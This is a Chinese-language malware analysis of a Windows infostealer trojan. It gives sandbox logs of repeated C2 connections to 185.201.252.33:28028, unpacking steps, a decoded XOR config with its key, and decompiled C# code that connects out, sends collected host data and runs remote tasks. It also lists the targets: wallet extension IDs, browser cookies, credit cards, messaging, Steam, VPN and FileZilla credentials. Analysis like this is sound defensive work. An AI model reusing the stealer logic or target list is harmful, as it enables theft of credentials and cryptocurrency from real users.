【病毒分析】f636ebe109c71aba251df70bede3a88e513752b8
病毒名称
EAST:Win32/Kryptik.HMIB trojan Kaspersky:Win32.ShellCode.Agent.pef
简单描述
1.不间断请求连接可疑网址
2.获取计算机信息、进程信息;具备反调试的能力
3.释放隐藏文件 4.存在数据库调用路径
联网行为
17:55:53:172,4167e92fe9fd2be02010793acafe7a44.exe,3332:3364,3332,NET_connect,185.201.252.33:28028,protocol:(TCP)0 ,0x00000000[操作成功完成]
每隔21s发一次连接请求
该网址有过 垃圾邮件的情报 所引用的API:
GetSystemTimeAsFileTime:检索当前系统日期和时间 GetNativeSystemInfo:获取当前系统的相关信息
GetSystemWindowsDirectoryA:获取系统目录信息 CreateToolhelp32Snapshot:枚举进程模块、获取系统中正在运行的进程信息,线程信息
IsDebuggerPresent:检测进程本身是否被调试 LoadResource:搜索并加载模块资源
异常行为:释放隐藏文件
12:25:22:743,rundll32.exe,3212:0,3212,BA_extract_hidden,C:\System Volume Information\SPP\SppCbsHiveStore{cd42efe1-f6f1-427c-b004-033192c625a4}{5BAB9B94-6310-45F9-AF7D-D9111F7540F3}{0c293209-623d-11ec-b152-000c29daac43}.TMContainer00000000000000000001.regtrans-ms,,0x00000000 [操作成功完成 ],
12:25:22:744,rundll32.exe,3212:0,3212,BA_extract_hidden,C:\System Volume Information\SPP\SppCbsHiveStore{cd42efe1-f6f1-427c-b004-033192c625a4}{5BAB9B94-6310-45F9-AF7D-D9111F7540F3}{0c293209-623d-11ec-b152-000c29daac43}.TMContainer00000000000000000002.regtrans-ms,,0x00000000 [操作成功完成],
12:25:22:748,rundll32.exe,3212:0,3212,BA_extract_hidden,C:\System Volume Information\SPP\SppCbsHiveStore{cd42efe1-f6f1-427c-b004-033192c625a4}{5BAB9B94-6310-45F9-AF7D-D9111F7540F3}{0c293209-623d-11ec-b152-000c29daac43}.TM.blf,,0x00000000 [操作成功完成 ],
12:25:22:920,rundll32.exe,3212:0,3212,BA_extract_hidden,C:\System Volume Information\SPP\SppGroupCache\Temp_{2F4E30DE-2273-4B0A-9019-AE3083BED29E}_WindowsUpdateInfo,,0x00000000 [操作成功完成 ],
数据库访问 .rdata:004263E8 0000000B C C:\zuw.pdb
学习笔记如下
一进程序就做下面这件事,然后可以跳转到这个内存分配的点,然后就正常走到内存释放的点之前把里面有用的提取出来。
bp VirtualAlloc
bp VirtualFree
中间需要不停的跟随数据窗口看数据
就是一般分配空间完有一段空白的 后面才写东西进去
第一个是280000的时候
提取出来这个之后就可以脱壳..
. NET Reactor 是一款强大的 .NET 代码混淆加密保护工具,常用于防止对 .NET 程序的反编译破解等场景。
de4dot 280000.bin
EntryPoint()
IP = "FDUMXjsZEBYmPEMKFzUiGjoJFFcmBRAEFAsMUg=="; https://api.ip.sb/geoip
ID = "OikhGRU0NVMmBTUBFAZWUg=="; ID: isSecureegram.exe
Message = "";
Key = "Yakows";
解密:
FromBase64String(StringDecrypt.Xor(FromBase64String(b64), stringKey));
Xor(string input, string stringKey):input[i] ^ stringKey[i % stringKey.Length]
public static class Program
{
private static void Main(string[] args)
{
new EntryPoint().Execute();
}
public static void Execute(this EntryPoint entry)
{
try
{
if (!string.IsNullOrWhiteSpace(entry.Message))
{
new Thread(delegate()
{
MessageBox.Show(StringDecrypt.Decrypt(entry.Message, entry.Key), "", MessageBoxButtons.OK, MessageBoxIcon.Hand);
})
{
IsBackground = true
}.Start();
}
using (EndpointConnection endpointConnection = new EndpointConnection())
{
bool flag = false;
IL_B1:
while (!flag)
{
foreach (string address in StringDecrypt.Decrypt(entry.IP, entry.Key).Split(new string[]
{
"|"
}, StringSplitOptions.RemoveEmptyEntries))
{
if (endpointConnection.RequestConnection(address) && endpointConnection.TryGetConnection())//请求连接 连外网的
{
flag = true;
IL_A7:
Thread.Sleep(5000);
goto IL_B1;
}
}
goto IL_A7;
}
ScanningArgs settings = new ScanningArgs();//扫描器
while (!endpointConnection.TryGetArgs(out settings))
{
if (!endpointConnection.TryGetConnection())
{
throw new Exception();
}
Thread.Sleep(1000);
}
ScanResult scanResult = new ScanResult
{
ReleaseID = StringDecrypt.Decrypt(entry.ID, entry.Key)
};
IdentitySenderBase identitySenderBase = SenderFactory.Create(entry.Version); //API端口
while (!identitySenderBase.Send(endpointConnection, settings, ref scanResult))
{
Thread.Sleep(5000);
}
ScanResult user = scanResult;
user.ScanDetails = new ScanDetails();//扫描详情 获取了主机信息
user.Monitor = null;
IList<UpdateTask> tasks = new List<UpdateTask>();
while (!endpointConnection.TryGetTasks(user, out tasks))
{
if (!endpointConnection.TryGetConnection())
{
IL_1D5:
throw new Exception();
}
Thread.Sleep(1000);
}
using (List<int>.Enumerator enumerator = new TaskResolver(scanResult).ReleaseUpdates(tasks).GetEnumerator())
{
while (enumerator.MoveNext())
{
int taskId = enumerator.Current;
while (!endpointConnection.TryCompleteTask(user, taskId))
{
if (!endpointConnection.TryGetConnection())
{
throw new Exception();
}
Thread.Sleep(1000);
}
}
goto IL_1E1;
}
goto IL_1D5;
IL_1E1:;
}
}
catch (Exception)
{
entry.Execute();
}
}
// Token: 0x06000058 RID: 88 RVA: 0x00006AF4 File Offset: 0x00004CF4
public static bool SeenBefore()//建日志
{
try
{
string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Yandex\\YaAddon");
if (Directory.Exists(path))
{
return true;
}
Directory.CreateDirectory(path);
return false;
}
catch
{
}
return false;
}
}
各个部分:
AllWallets:wallet.dat 访问我的钱包数据
BrEx: 检测本机 加密货币的钱包
ffnbelfdoeiohenkjibnmadjiehjhajb| YoroiWallet
ibnejdfjmmkpcnlpebklmnkoeoihofec|Tronlink
jbdaocneiiinmjbjlgalhcelgbejmnid| NiftyWallet
nkbihfbeogaeaoehlefnkodbefgpgknn|Metamask
afbcbjpbpfadlkmhmclhkeeodmamcflc| MathWallet
hnfanknocfeofbddgcijnmhnfnkdnaad|Coinbase
fhbohimaelbohpjbbldcngcnapndodjp|BinanceChain
odbfpeeihdkbihmopkbjmoonfanlbfcl| BraveWallet
hpglfhgfnhbgpjdenjgmdgoeiappafln|GuardaWallet
blnieiiffboillknjnepogjhkgnoapac|EqualWallet
cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
fihkakfobkmkjojpchpfgcmhfjnmnfpi|BitAppWallet
kncchdigobghenbbaddojjnnaogfppfj|iWallet
amkmjjmmflddogmhpjloimipbofnfjih|Wombat
fhilaheimglignddkjgofkcbgekhenbh|AtomicWallet
nlbmnnijcnlegkjjpcfjclmcfggfefdm|MewCx
nanjmdknhkinifnkgdcggcfnhdaammmj|GuildWallet
nkddgncdjgjfcddamfgcmfnlhccnimig|SaturnWallet
fnjhmkhhmkbjkkabndcnnogagogbneec|RoninWallet
aiifbnbfobpmeekipheeijimdpnlpgpp|TerraStation
fnnegphlobjdpkhecapkijjdkgcjhkib|HarmonyWallet
aeachknmefphepccionboohckonoeemg|Coin98Wallet
cgeeodpfagjceefieflmdfphplkenlfk|TonCrystal
pdadjkfkgcafgbceimcpbkalnfnepbnk|KardiaChain
针对以下的加密货币钱包操作
Armory:Armory
El3_K_Tr00M:Electrum
Eth:Ethereum
E_x0_d_u_S:Exodus
mYDict:Monero
GClass1: Coinomi
JX:Jaxx
Browser: 获取游览器信息
GClass0:获取游览器Cookie
cookies.sqlite
Chr_0_M_e:获取信用卡信息
credit_cards
Discord:获取通讯服务数据
DesktopMessanger:Telegram
GameLauncher:获取游戏服务的数据
Software\Valve\Steam
GeoPlugin:获取使用者的地理位置
LocatorAPI: 此应用程序根据来自各个基站的信息计算移动站点的大致位置。
收集VPN,NordVPN、OpenVPN和ProtonVPN的相关信息
NordApp: NordVPN
OpenVPN:OpenVPN
ProtonVPN:ProtonVPN
SystemInfoHelper:获取主机信息
FileZilla:从本地FTP客户端软件获取凭证
sitemanager.xml中保存的是站点管理器中的信息
recentservers.xml保存的是最近访问的服务器信息
\FileZilla\recentservers.xml
\FileZilla\sitemanager.xml
